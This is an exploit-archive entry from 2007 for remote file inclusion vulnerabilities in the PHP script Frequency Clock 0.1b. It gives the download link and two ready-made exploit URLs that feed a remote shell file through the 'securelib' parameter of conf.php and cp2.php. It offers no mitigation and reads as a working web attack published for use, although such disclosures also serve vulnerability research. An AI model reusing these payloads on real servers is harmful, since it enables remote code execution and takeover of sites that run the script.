id: 1915
date: 05/26/2007
title: Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities
author: ThE TiGeR
cves: 

======================================================================
Frequency Clock 0.1b (securelib) Remote File Inclusion Vulnerabilities
======================================================================


#Frequency Clock Beta 0.1 Remote file include (securelib)

#Download script : http://kop.fact.co.uk/DIVE/cd/distribution/Frequency_Clock/frequencyclock.zip

#Thanks str0ke :D

#Exploit

#http://localhost/[PATH]/conf.php?securelib=shell.txt?

##http://localhost/[PATH]/cp2.php?securelib=shell.txt?

#Discovered by : ThE TiGeR



#  0day.today [2023-03-23]  #